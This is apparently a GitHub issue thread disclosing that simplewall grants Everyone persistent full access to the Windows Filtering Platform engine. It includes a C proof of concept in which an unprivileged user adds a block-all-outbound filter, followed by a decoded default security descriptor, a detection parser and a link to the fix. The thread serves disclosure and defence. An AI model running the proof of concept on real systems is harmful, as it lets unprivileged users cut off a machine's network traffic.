Simplewall grants Everyone (i.e. S-1-1-0) access to the filter engine with FwpmEngineSetSecurityInfo()
That means all unprivileged users have full access to the filter engine, which is supposed to require Admin.
Even if you uninstall simplewall, that change will persist. If you have ever clicked "Enable Filters", then all unprivileged users have access to the filter engine, even sandboxed low integrity processes.
I wondered why I suddenly stopped needing UAC to use FwpmFilterAdd0, and then noticed this bug.
I think there needs to be an update that:
Here is a utility to verify this vulnerability; it creates a filter to block all outbound traffic. It should not work unless you are running as Administrator.
#include <stdio.h>
#include <conio.h>
#include <windows.h>
#include <fwpmu.h>

#pragma comment(lib, "FWPUCLNT")

int main(int argc, char **argv)
{
    HANDLE engineHandle;
    FWPM_FILTER0 fwpFilter;
    UINT64 FilterId;
    DWORD result;
    FWPM_SESSION0 fwpSession = {
        .flags = FWPM_SESSION_FLAG_DYNAMIC   // filter is removed when the session closes
    };

    ZeroMemory(&fwpFilter, sizeof(FWPM_FILTER0));

    // WFP functions return the Win32 error code directly; they do not set the last error
    result = FwpmEngineOpen0(NULL,
                             RPC_C_AUTHN_DEFAULT,
                             NULL,
                             &fwpSession,
                             &engineHandle);
    if (result != ERROR_SUCCESS) {
        fprintf(stderr, "FwpmEngineOpen0 failed, %#x\n", result);
        return 1;
    }

    // Block all outbound IPv4 connections; weight left at FWP_EMPTY so BFE assigns one
    fwpFilter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
    fwpFilter.action.type = FWP_ACTION_BLOCK;
    fwpFilter.displayData.name = L"Testing FwpmEngineSetSecurityInfo";

    // Adding a filter needs write access to the engine, which only Administrators should hold
    result = FwpmFilterAdd0(engineHandle, &fwpFilter, NULL, &FilterId);
    if (result != ERROR_SUCCESS) {
        fprintf(stderr, "FwpmFilterAdd0 failed, %#x\n", result);
        return 1;
    }

    fprintf(stderr, "Success: Press any key To remove filter...\n");
    _getch();

    FwpmFilterDeleteById0(engineHandle, FilterId);
    FwpmEngineClose0(engineHandle);
    return 0;
}
To reproduce this problem, on a machine that has never had simplewall installed, create an unprivileged user and run the program above.
It should say FwpmFilterAdd0 failed 5 (i.e. Access Denied).
Now install simplewall and run it at least once; you can uninstall it after that if you like.
Now run it again, and it should say "Success", and it is able to block all outbound traffic.
C:\WINDOWS\system32>whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
C:\WINDOWS\system32>testwall.exe
Success: Press any key To remove filter...
Wow, this is bad... Thanks for reporting, hoping for a swift solution.
I wrote some code to reset the SD to the default; you can take a look here:
https://gist.github.com/taviso/b65562b083c9b5cf98adfa0642845aa2
The default has a complicated DACL, here it is from a Windows 10 1909 Machine:
O:BAG:LSD:AI(A;;0xf07ff;;;BA)(A;OICIIO;GA;;;BA)(A;;0x307ff;;;NO)(A;OICIIO;GXGWGR;;;NO)(A;;0x307ff;;;S-1-5-80-3088073201-1464728630-1879813800-1107566885-823218052)(A;OICIIO;GXGWGR;;;S-1-5-80-3088073201-1464728630-1879813800-1107566885-823218052)(A;;0x203f4;;;S-1-5-80-3141615172-2057878085-1754447212-2405740020-3916490453)(A;OICIIO;GXGR;;;S-1-5-80-3141615172-2057878085-1754447212-2405740020-3916490453)(A;;0x307ff;;;S-1-5-80-3044542841-3639452079-4096941652-1606687743-1256249853)(A;OICIIO;GXGWGR;;;S-1-5-80-3044542841-3639452079-4096941652-1606687743-1256249853)(A;;0x307ff;;;S-1-5-80-979556362-403687129-3954533659-2335141334-1547273080)(A;OICIIO;GXGWGR;;;S-1-5-80-979556362-403687129-3954533659-2335141334-1547273080)(A;;0x203f4;;;S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420)(A;OICIIO;GXGR;;;S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420)(A;;0x307ff;;;S-1-5-80-1510742542-3632397484-604094731-3920060944-1272132581)(A;OICIIO;GXGWGR;;;S-1-5-80-1510742542-3632397484-604094731-3920060944-1272132581)(A;OICI;RPDT;;;WD)
Those are a bunch of Service SIDs, like MpsSvc and NlaSvc. I think we should put those back, removing them might break something.
Here they are decoded:
"O:LS" // Owner: Local service
"G:LS" // Group: Local service
"D:AI" // Dacl: (Auto Inherited)
// Builtin Administrators
"(A;;0xf07ff;;;BA)"
"(A;OICIIO;GA;;;BA)"
// Network configuration operators
"(A;;0x307ff;;;NO)"
"(A;OICIIO;GXGWGR;;;NO)"
// MpsSvc (Malware Protection)
"(A;;0x307ff;;;S-1-5-80-3088073201-1464728630-1879813800-1107566885-823218052)"
"(A;OICIIO;GXGWGR;;;S-1-5-80-3088073201-1464728630-1879813800-1107566885-823218052)"
// NlaSvc (Network Location Awareness)
"(A;;0x203f4;;;S-1-5-80-3141615172-2057878085-1754447212-2405740020-3916490453)"
"(A;OICIIO;GXGR;;;S-1-5-80-3141615172-2057878085-1754447212-2405740020-3916490453)"
// PolicyAgent
"(A;;0x307ff;;;S-1-5-80-3044542841-3639452079-4096941652-1606687743-1256249853)"
"(A;OICIIO;GXGWGR;;;S-1-5-80-3044542841-3639452079-4096941652-1606687743-1256249853)"
// RpcSs
"(A;;0x307ff;;;S-1-5-80-979556362-403687129-3954533659-2335141334-1547273080)"
"(A;OICIIO;GXGWGR;;;S-1-5-80-979556362-403687129-3954533659-2335141334-1547273080)"
// WdiServiceHost
"(A;;0x203f4;;;S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420)"
"(A;OICIIO;GXGR;;;S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420)"
// IKE/IpSec
"(A;;0x307ff;;;S-1-5-80-1510742542-3632397484-604094731-3920060944-1272132581)"
"(A;OICIIO;GXGWGR;;;S-1-5-80-1510742542-3632397484-604094731-3920060944-1272132581)"
// Everyone (Write Properties / Delete Subtree)
"(A;OICI;RPDT;;;WD)";
I can't seem to change the owner back to O:LS, I guess it's not a huge deal, O:BA is good enough. But do you know why? It would be nice to put it back the way it was if possible!
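A way to check whether a machine's filter engine has been opened up like this, written as an added example for this thread and not code from the report, the gist, or simplewall: on the Windows side, fetch the engine's descriptor with FwpmEngineGetSecurityInfo0() and turn it into a string with ConvertSecurityDescriptorToStringSecurityDescriptor(), then feed that SDDL string to the parser below. It isolates the access-allowed ACEs for Everyone (WD or S-1-1-0) and reports whether any of them carry a right that lets the holder change policy. It is plain C with no Windows headers so it builds anywhere. DEFAULT_SD is the 1909 descriptor quoted above with the service-SID ACEs abbreviated to the MpsSvc pair; OPENED_SD is a constructed descriptor standing in for what simplewall leaves behind, since the exact ACE it writes is not shown in this thread. The FWPM_ACTRL_* values are the ones from fwpmtypes.h.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Generic rights (winnt.h) and the WFP-specific FWPM_ACTRL_* bits (fwpmtypes.h). */
#define GENERIC_WRITE              0x40000000UL
#define GENERIC_ALL                0x10000000UL
#define FWPM_ACTRL_ADD             0x001UL
#define FWPM_ACTRL_ADD_LINK        0x002UL
#define FWPM_ACTRL_BEGIN_WRITE_TXN 0x008UL
#define FWPM_ACTRL_WRITE           0x400UL
/* Any of these lets the holder change filtering policy. */
#define WFP_WRITE_RIGHTS (FWPM_ACTRL_ADD | FWPM_ACTRL_ADD_LINK | \
    FWPM_ACTRL_BEGIN_WRITE_TXN | FWPM_ACTRL_WRITE | GENERIC_WRITE | GENERIC_ALL)

/* A rights field is a hex mask or a run of two-letter codes. SDDL names the low bits
   after directory-service rights, so "RP" is bit 0x10 and "DT" is bit 0x40. */
static unsigned long parse_rights(const char *s, size_t n)
{
    static const struct { char c[3]; unsigned long bit; } tab[] = {
        {"GA", GENERIC_ALL}, {"GR", 0x80000000UL}, {"GW", GENERIC_WRITE},
        {"GX", 0x20000000UL}, {"RC", 0x20000}, {"SD", 0x10000}, {"WD", 0x40000},
        {"WO", 0x80000}, {"CC", 0x01}, {"DC", 0x02}, {"LC", 0x04}, {"SW", 0x08},
        {"RP", 0x10}, {"WP", 0x20}, {"DT", 0x40}, {"LO", 0x80}, {"CR", 0x100} };
    unsigned long mask = 0;
    if (n > 2 && s[0] == '0' && (s[1] == 'x' || s[1] == 'X'))
        return strtoul(s, NULL, 16);          /* stops at the ';' ending the field */
    for (size_t i = 0; i + 1 < n; i += 2)
        for (size_t k = 0; k < sizeof tab / sizeof tab[0]; k++)
            if (s[i] == tab[k].c[0] && s[i + 1] == tab[k].c[1]) { mask |= tab[k].bit; break; }
    return mask;
}

typedef struct { const char *f[6]; size_t n[6]; } ace_t;

/* Split the ACE "(type;flags;rights;objguid;inhguid;sid)" at p; *end then points past ')'. */
static int split_ace(const char *p, const char **end, ace_t *a)
{
    if (*p++ != '(') return 0;
    for (int i = 0; i < 6; i++) {
        const char *q = p;
        while (*q && *q != ';' && *q != ')') q++;
        a->f[i] = p;
        a->n[i] = (size_t)(q - p);
        if (*q == ')') { *end = q + 1; return i == 5; }
        if (*q != ';') return 0;              /* unterminated ACE */
        p = q + 1;
    }
    return 0;                                 /* more than six fields */
}

static int field_is(const ace_t *a, int i, const char *s)
{ return strlen(s) == a->n[i] && memcmp(a->f[i], s, a->n[i]) == 0; }

/* OR of rights granted to Everyone (WD / S-1-1-0) by access-allowed ACEs in the DACL.
   With include_inherit_only == 0, "IO" ACEs are skipped: they only propagate to child
   objects and say nothing about the engine object itself. */
unsigned long everyone_allowed_rights(const char *sddl, int include_inherit_only)
{
    const char *p = strstr(sddl, "D:");
    unsigned long mask = 0;
    ace_t a;
    if (!p) return 0;
    for (p += 2; *p && *p != '('; p++)        /* skip DACL control flags (AI, P, ...) */
        ;
    while (*p == '(' && split_ace(p, &p, &a)) {
        int io = 0;
        for (size_t k = 0; k + 1 < a.n[1]; k += 2)
            io |= a.f[1][k] == 'I' && a.f[1][k + 1] == 'O';
        if (!field_is(&a, 0, "A") || (io && !include_inherit_only)) continue;
        if (field_is(&a, 5, "WD") || field_is(&a, 5, "S-1-1-0"))
            mask |= parse_rights(a.f[2], a.n[2]);
    }
    return mask;
}

int everyone_can_modify_policy(const char *sddl)
{ return (everyone_allowed_rights(sddl, 1) & WFP_WRITE_RIGHTS) != 0; }

/* Default engine SD from the 1909 dump above, service-SID ACEs abbreviated to one pair. */
static const char DEFAULT_SD[] =
    "O:BAG:LSD:AI(A;;0xf07ff;;;BA)(A;OICIIO;GA;;;BA)(A;;0x307ff;;;NO)(A;OICIIO;GXGWGR;;;NO)"
    "(A;;0x307ff;;;S-1-5-80-3088073201-1464728630-1879813800-1107566885-823218052)"
    "(A;OICIIO;GXGWGR;;;S-1-5-80-3088073201-1464728630-1879813800-1107566885-823218052)"
    "(A;OICI;RPDT;;;WD)";

/* Constructed stand-in for the opened-up state: a full-access allow ACE for Everyone.
   The exact ACE simplewall writes is not shown in the thread, so this one is assumed. */
static const char OPENED_SD[] =
    "O:BAG:LSD:AI(A;;0xf07ff;;;BA)(A;OICIIO;GA;;;BA)(A;OICI;0xf07ff;;;S-1-1-0)";

int main(void)
{
    const char *names[] = { "default", "opened" }, *sds[] = { DEFAULT_SD, OPENED_SD };
    for (int i = 0; i < 2; i++)
        printf("%s: Everyone holds 0x%lx on the engine, policy %s\n", names[i],
               everyone_allowed_rights(sds[i], 0),
               everyone_can_modify_policy(sds[i]) ? "MODIFIABLE" : "protected");
    return 0;
}
```

One detail the parser makes visible: the default's (A;OICI;RPDT;;;WD) grants Everyone bits 0x10 and 0x40, and on a WFP object those positions are FWPM_ACTRL_CLASSIFY and FWPM_ACTRL_OPEN, which is why an unprivileged FwpmEngineOpen0() succeeds on a clean machine while FwpmFilterAdd0() fails with access denied. A restore tool should compare against that mask rather than just looking for the presence of an Everyone ACE.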
@henrypp Should be considered a high priority security risk, don't you think?
Could you tell us why this is happening, too?
It's fixed in https://github.com/henrypp/simplewall/commit/1919797c98f7566c927ab1a70c64179c38492c13. Thank you for the report!